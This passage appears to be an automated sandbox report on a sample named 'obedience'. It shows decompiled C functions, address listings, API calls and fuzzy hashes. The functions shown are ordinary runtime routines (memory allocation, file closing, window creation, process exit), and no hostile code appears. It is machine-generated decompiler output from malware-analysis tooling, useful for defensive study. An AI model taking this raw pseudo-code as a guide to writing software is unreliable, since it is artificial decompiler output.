        • Part of subcall function 6EDA21D7: std::locale::_Setgloballocale.LIBCPMT ref: 6EDA2220
        • Part of subcall function 6EDA21D7: _Yarn.LIBCPMT ref: 6EDA2236
      • std::_Lockit::_Lockit.LIBCPMT ref: 6ED91AB6
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: std::locale::_$LockitLockit::_std::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn_malloc
      • String ID:
      • API String ID: 385601912-0
      • Opcode ID: 73ee569acaafc9ecaacb2611f9c02dbacfc9f2e4a85841f2bb523addd8ee6267
      • Instruction ID: ac7774d132391ad9adf79daf130dc0b20a1208863efa69762f47a992a44b2754
      • Opcode Fuzzy Hash: 73ee569acaafc9ecaacb2611f9c02dbacfc9f2e4a85841f2bb523addd8ee6267
      • Instruction Fuzzy Hash: C11121B1900B049FC720DFABD98055AFBF8FF95314B104B5FC95A87A50D7B1A60ACB91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00462164 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00462164(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x48eeb4;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x490664; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E004622A4(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









      0x00462168
      0x00462176
      0x00462179
      0x0046217e
      0x00462183
      0x00462186
      0x00462190
      0x0046219a
      0x00000000
      0x00000000
      0x00000000
      0x00462192
      0x00462192
      0x00462192
      0x00462192
      0x004621a0
      0x004621ab
      0x004621b0
      0x004621b1
      0x004621b4
      0x004621bd

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CursorLoad
      • String ID:
      • API String ID: 3238433803-0
      • Opcode ID: ce4fd5f14f72f2e6f9e38551c1d122c1e601436f3e97dedd7963cb121c9a847f
      • Instruction ID: 18bdd2f485cb405d7b350cbfba75d23e3275ef188cabeec006cd0d919494e6e5
      • Opcode Fuzzy Hash: ce4fd5f14f72f2e6f9e38551c1d122c1e601436f3e97dedd7963cb121c9a847f
      • Instruction Fuzzy Hash: 70F05E12E08A143B9620253E4DC1AAA7259DBD3334B20433BFA29972D1E6696C02425B
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED972F8 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 89%
      			E6ED972F8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t20;
				signed int _t22;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;

				_push(0xc);
				_push(0x6edaa080);
				L6ED99460(__ebx, __edi, __esi);
				 *(_t33 - 0x1c) =  *(_t33 - 0x1c) | 0xffffffff;
				_t32 =  *((intOrPtr*)(_t33 + 8));
				_t35 = _t32;
				_t36 = _t35 != 0;
				if(_t35 != 0) {
					__eflags =  *(_t32 + 0xc) & 0x00000040;
					if(( *(_t32 + 0xc) & 0x00000040) == 0) {
						E6ED96B4F(_t32);
						 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
						_t20 = E6ED9728B(__ebx, __edx, _t32); // executed
						 *(_t33 - 0x1c) = _t20;
						 *(_t33 - 4) = 0xfffffffe;
						L6ED97364(_t32);
					} else {
						_t9 = _t32 + 0xc;
						 *_t9 =  *(_t32 + 0xc) & 0x00000000;
						__eflags =  *_t9;
					}
					_t22 =  *(_t33 - 0x1c);
				} else {
					 *((intOrPtr*)(E6ED987F9(_t36))) = 0x16;
					_t22 = E6ED987A7() | 0xffffffff;
				}
				return L6ED994A5(_t22);
			}








      0x6ed972f8
      0x6ed972fa
      0x6ed972ff
      0x6ed97304
      0x6ed9730a
      0x6ed9730d
      0x6ed97312
      0x6ed97314
      0x6ed9732b
      0x6ed9732f
      0x6ed9733f
      0x6ed97345
      0x6ed9734a
      0x6ed97350
      0x6ed97353
      0x6ed9735a
      0x6ed97331
      0x6ed97331
      0x6ed97331
      0x6ed97331
      0x6ed97331
      0x6ed97335
      0x6ed97316
      0x6ed9731b
      0x6ed97326
      0x6ed97326
      0x6ed9733d

      APIs
        • Part of subcall function 6ED987F9: __getptd_noexit.LIBCMT ref: 6ED987F9
      • __lock_file.LIBCMT ref: 6ED9733F
        • Part of subcall function 6ED96B4F: __lock.LIBCMT ref: 6ED96B74
      • __fclose_nolock.LIBCMT ref: 6ED9734A
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
      • String ID:
      • API String ID: 2800547568-0
      • Opcode ID: 2d91fbeb197e75d1fb81696b3e1276d8e932622e8292a323aeddc90cdf583fce
      • Instruction ID: a952f83f78b53562920816ecdd602206764e81ff4730c182250b985610741f7a
      • Opcode Fuzzy Hash: 2d91fbeb197e75d1fb81696b3e1276d8e932622e8292a323aeddc90cdf583fce
      • Instruction Fuzzy Hash: 7CF09A30811705EED7609BF9DC017DE7BA86F01739F208B08D874AA1D0DB789A01ABA9
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED967C7 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 100%
      			E6ED967C7(int _a4) {

				E6ED9679C(_a4);
				ExitProcess(_a4);
			}



      0x6ed967cf
      0x6ed967d8

      APIs
      • ___crtCorExitProcess.LIBCMT ref: 6ED967CF
        • Part of subcall function 6ED9679C: GetModuleHandleW.KERNEL32(mscoree.dll,?,6ED967D4,6ED962AF,?,6ED999F8,000000FF,0000001E,6EDAA1B0,0000000C,6ED99AA3,6ED962AF,6ED962AF,?,6ED981D9,0000000D), ref: 6ED967A6
        • Part of subcall function 6ED9679C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6ED967B6
      • ExitProcess.KERNEL32 ref: 6ED967D8
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: ExitProcess$AddressHandleModuleProc___crt
      • String ID:
      • API String ID: 2427264223-0
      • Opcode ID: 80cd05067be819e5eb950a893e5d5338335e8770e172e115a4e1dcad8188f008
      • Instruction ID: c1829fa293f6e591766aba2874ba74751bb9a5f5ad6f9e6bcda3df97c396ada8
      • Opcode Fuzzy Hash: 80cd05067be819e5eb950a893e5d5338335e8770e172e115a4e1dcad8188f008
      • Instruction Fuzzy Hash: 22B09231010608FBEF012F6ADC0988E3F7AEB812A0B104020F82909030DF72AED2EAD4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040167C Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E0040167C(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E004014A0(0x4905e8, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







      0x0040167f
      0x00401689
      0x00401698
      0x0040168b
      0x0040168b
      0x0040168b
      0x0040169e
      0x004016ab
      0x004016b0
      0x004016b2
      0x004016b6
      0x004016bf
      0x004016c6
      0x004016d2
      0x004016d9
      0x00000000
      0x004016d9
      0x004016c6
      0x004016de

      APIs
      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401A0F), ref: 004016AB
      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401A0F), ref: 004016D2
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Virtual$AllocFree
      • String ID:
      • API String ID: 2087232378-0
      • Opcode ID: ab7cb4c8c7d830e1c987375a219b8e05183eee67bae2a6a0faba20256de70036
      • Instruction ID: 75673b8b8ef96fe5343b75f1d018d7f02825121c1262bbd79dd6b8b433f716b9
      • Opcode Fuzzy Hash: ab7cb4c8c7d830e1c987375a219b8e05183eee67bae2a6a0faba20256de70036
      • Instruction Fuzzy Hash: 8FF02E73F0072027EB20966A0CC5B5756D49F457A4F194477F94CFF3D8D6764C014258
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED94600 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
      Download Yara Rule
      C-Code - Quality: 87%
      			E6ED94600(void* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t35;
				void* _t38;
				void* _t40;
				intOrPtr* _t42;
				void* _t46;
				intOrPtr _t51;
				intOrPtr* _t54;
				intOrPtr _t58;
				signed int _t66;
				signed int _t71;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xc;
				_t46 = __ecx;
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) != __ecx + 0x48 || _a16 != 1 ||  *((intOrPtr*)(__ecx + 0x44)) != 0) {
					_t71 = _a12;
					_t66 = _a8;
				} else {
					_t71 = _a12;
					_t66 = _a8 + 0xffffffff;
					asm("adc esi, 0xffffffff");
				}
				if( *((intOrPtr*)(_t46 + 0x54)) == 0 || L6ED95000(_t46, _t66, _t71) == 0) {
					L14:
					_t35 = _a4;
					_t51 =  *0x6eda8a6c; // 0xffffffff
					_t58 =  *0x6eda8a68; // 0xffffffff
					 *((intOrPtr*)(_t35 + 4)) = _t51;
					__eflags = 0;
					 *_t35 = _t58;
					 *((intOrPtr*)(_t35 + 8)) = 0;
					 *((intOrPtr*)(_t35 + 0xc)) = 0;
					 *((intOrPtr*)(_t35 + 0x10)) = 0;
					return _t35;
				} else {
					_t60 = _t66 | _t71;
					if((_t66 | _t71) != 0) {
						L9:
						_push(_a16);
						_push(_t71);
						_push(_t66);
						_push( *((intOrPtr*)(_t46 + 0x54))); // executed
						_t38 = E6ED96E9A(_t46, _t60, _t66, _t71, _t84); // executed
						_t76 = _t76 + 0x10;
						if(_t38 != 0) {
							goto L14;
						} else {
							goto L10;
						}
					} else {
						_t84 = _a16 - 1;
						if(_a16 == 1) {
							L10:
							_t40 = E6ED96F19(_t46,  &_v12, _t66,  *((intOrPtr*)(_t46 + 0x54)),  &_v12); // executed
							if(_t40 != 0) {
								goto L14;
							} else {
								_t54 =  *((intOrPtr*)(_t46 + 0x10));
								if( *_t54 == _t46 + 0x48) {
									 *_t54 =  *((intOrPtr*)(_t46 + 0x3c));
									 *((intOrPtr*)( *((intOrPtr*)(_t46 + 0x20)))) =  *((intOrPtr*)(_t46 + 0x40));
									 *((intOrPtr*)( *((intOrPtr*)(_t46 + 0x30)))) = 0;
								}
								_t42 = _a4;
								 *((intOrPtr*)(_t42 + 8)) = _v12;
								 *_t42 = 0;
								 *((intOrPtr*)(_t42 + 4)) = 0;
								 *((intOrPtr*)(_t42 + 0xc)) = _v8;
								 *((intOrPtr*)(_t42 + 0x10)) =  *((intOrPtr*)(_t46 + 0x4c));
								return _t42;
							}
						} else {
							goto L9;
						}
					}
				}
			}





















      0x6ed94606
      0x6ed9460a
      0x6ed94616
      0x6ed94632
      0x6ed94635
      0x6ed94624
      0x6ed94627
      0x6ed9462a
      0x6ed9462d
      0x6ed9462d
      0x6ed9463c
      0x6ed946d1
      0x6ed946d1
      0x6ed946d4
      0x6ed946da
      0x6ed946e1
      0x6ed946e4
      0x6ed946e7
      0x6ed946e9
      0x6ed946ec
      0x6ed946ef
      0x6ed946f6
      0x6ed9464f
      0x6ed94651
      0x6ed94653
      0x6ed9465b
      0x6ed94661
      0x6ed94662
      0x6ed94663
      0x6ed94664
      0x6ed94665
      0x6ed9466a
      0x6ed9466f
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x6ed94655
      0x6ed94655
      0x6ed94659
      0x6ed94671
      0x6ed9467a
      0x6ed94684
      0x00000000
      0x6ed94686
      0x6ed94686
      0x6ed9468e
      0x6ed94696
      0x6ed9469b
      0x6ed946a2
      0x6ed946a2
      0x6ed946a4
      0x6ed946af
      0x6ed946b5
      0x6ed946bb
      0x6ed946c2
      0x6ed946c5
      0x6ed946ce
      0x6ed946ce
      0x00000000
      0x00000000
      0x00000000
      0x6ed94659
      0x6ed94653

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: __fseeki64
      • String ID:
      • API String ID: 3340294951-0
      • Opcode ID: 734283072c881421535b86914c31ed35a1c4cf24be97b0dabf2bc1f91c5b2db9
      • Instruction ID: e4fc80091236ffeba97b8afa0fc5254cec3493cfc161e9566a87ce9f1c6c420e
      • Opcode Fuzzy Hash: 734283072c881421535b86914c31ed35a1c4cf24be97b0dabf2bc1f91c5b2db9
      • Instruction Fuzzy Hash: 5F3181B1505205CFCB08CF58C89099677F5FF89324F1482AAEC288B396E331E812DF90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED9D81F Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 86%
      			E6ED9D81F(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x6edb089c, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x6edb118c;
					if( *0x6edb118c == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = L6ED99002(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E6ED987F9(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










      0x6ed9d824
      0x6ed9d829
      0x6ed9d846
      0x6ed9d84b
      0x6ed9d84d
      0x6ed9d84f
      0x6ed9d851
      0x6ed9d851
      0x6ed9d851
      0x00000000
      0x6ed9d859
      0x6ed9d862
      0x6ed9d868
      0x6ed9d86a
      0x00000000
      0x00000000
      0x6ed9d89e
      0x6ed9d8a0
      0x00000000
      0x6ed9d86c
      0x6ed9d86c
      0x6ed9d873
      0x6ed9d891
      0x6ed9d894
      0x6ed9d896
      0x6ed9d898
      0x6ed9d898
      0x6ed9d875
      0x6ed9d876
      0x6ed9d87c
      0x6ed9d87e
      0x6ed9d852
      0x6ed9d852
      0x6ed9d854
      0x6ed9d857
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x6ed9d880
      0x6ed9d880
      0x6ed9d883
      0x6ed9d885
      0x6ed9d887
      0x6ed9d887
      0x6ed9d88d
      0x6ed9d88d
      0x6ed9d87e
      0x00000000
      0x6ed9d82b
      0x6ed9d82f
      0x6ed9d832
      0x6ed9d835
      0x00000000
      0x6ed9d837
      0x6ed9d83c
      0x6ed9d845
      0x6ed9d845
      0x6ed9d835
      0x00000000

      APIs
      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6ED99857,6ED962AF,?,00000000,00000000,00000000,?,6ED9826E,00000001,00000214), ref: 6ED9D862
        • Part of subcall function 6ED987F9: __getptd_noexit.LIBCMT ref: 6ED987F9
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: AllocateHeap__getptd_noexit
      • String ID:
      • API String ID: 328603210-0
      • Opcode ID: 6156ed7966baa20c6300c8d694901e12fa7bbd16937729ebfff71cf0937a7f40
      • Instruction ID: 3042090ed80ef95ff065a71edde20812d8ac43adaafa955242c795eb03707c78
      • Opcode Fuzzy Hash: 6156ed7966baa20c6300c8d694901e12fa7bbd16937729ebfff71cf0937a7f40
      • Instruction Fuzzy Hash: 0401D435211212DBFB559FEACC54B9A3B98AFC17A0F108529E869CF5D1DB78D400DE50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00407B24 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00407B24(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				long _v8;
				void* _t12;
				struct HWND__* _t22;
				long _t27;
				CHAR* _t30;

				_v8 = _t27;
				_t30 = __eax;
				_t12 = E00402F10();
				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402F00(_t12);
				return _t22;
			}








      0x00407b2b
      0x00407b30
      0x00407b32
      0x00407b61
      0x00407b6a
      0x00407b76

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CreateWindow
      • String ID:
      • API String ID: 716092398-0
      • Opcode ID: be214cb052235d754c96b4bdeccbc1efeff0a586498f2defdb6b5a19ef4b5dcd
      • Instruction ID: 7816b96de73c2626cc947abd71ed5d4f906e0709b5dfdd17496010f52610a920
      • Opcode Fuzzy Hash: be214cb052235d754c96b4bdeccbc1efeff0a586498f2defdb6b5a19ef4b5dcd
      • Instruction Fuzzy Hash: 55F097B2704119BFDB40DE9DDD85E9B77ECEB4C2A4B044169BA0CD7241D574ED1087A4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED96F19 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
      Download Yara Rule
      C-Code - Quality: 93%
      			E6ED96F19(void* __ebx, signed int __edx, void* __edi, intOrPtr _a4, signed int* _a8) {
				void* __esi;
				void* __ebp;
				signed int _t5;
				signed int _t6;
				signed int* _t19;

				_t21 = _a4;
				if(_a4 != 0) {
					_t19 = _a8;
					__eflags = _t19;
					if(__eflags != 0) {
						_push(_a4);
						_t5 = E6ED9B010(__ebx, __edx, __edi, _t19, __eflags); // executed
						 *_t19 = _t5;
						_t6 = _t5 | 0xffffffff;
						_t19[1] = __edx;
						__eflags = (_t5 & __edx) - _t6;
						if((_t5 & __edx) != _t6) {
							_t6 = 0;
							__eflags = 0;
						}
					} else {
						 *((intOrPtr*)(E6ED987F9(__eflags))) = 0x16;
						_t6 = E6ED987A7() | 0xffffffff;
					}
					return _t6;
				} else {
					 *((intOrPtr*)(E6ED987F9(_t21))) = 0x16;
					return E6ED987A7() | 0xffffffff;
				}
			}








      0x6ed96f1e
      0x6ed96f22
      0x6ed96f3a
      0x6ed96f3d
      0x6ed96f3f
      0x6ed96f56
      0x6ed96f59
      0x6ed96f61
      0x6ed96f65
      0x6ed96f68
      0x6ed96f6b
      0x6ed96f6d
      0x6ed96f6f
      0x6ed96f6f
      0x6ed96f6f
      0x6ed96f41
      0x6ed96f46
      0x6ed96f51
      0x6ed96f51
      0x6ed96f73
      0x6ed96f24
      0x6ed96f29
      0x6ed96f38
      0x6ed96f38

      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: __getptd_noexit
      • String ID:
      • API String ID: 3074181302-0
      • Opcode ID: cc93c9168983e349e1e60ef21e8c88aff92e49dd319356b20292ea6975efb5fd
      • Instruction ID: 331d2ab67c22f62f070fe1f9637d90dcf66fd21c85c97d50831000ed21b73d22
      • Opcode Fuzzy Hash: cc93c9168983e349e1e60ef21e8c88aff92e49dd319356b20292ea6975efb5fd
      • Instruction Fuzzy Hash: E2F082355646089ACB145FFDDC003AD3AE89F41B74F148B29E47C8B1D0DB70D880B7A4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00405E78 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00405E78(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E0040610C(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}








      0x00405e80
      0x00405e86
      0x00405e92
      0x00405e96
      0x00405e9f
      0x00405ea4
      0x00405ea6
      0x00405eab
      0x00405ead
      0x00405eb0
      0x00405eb0
      0x00405eab
      0x00405eb3
      0x00405ebe

      APIs
      • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00405E96
        • Part of subcall function 0040610C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0048E0A8), ref: 00406127
        • Part of subcall function 0040610C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0048E0A8), ref: 00406145
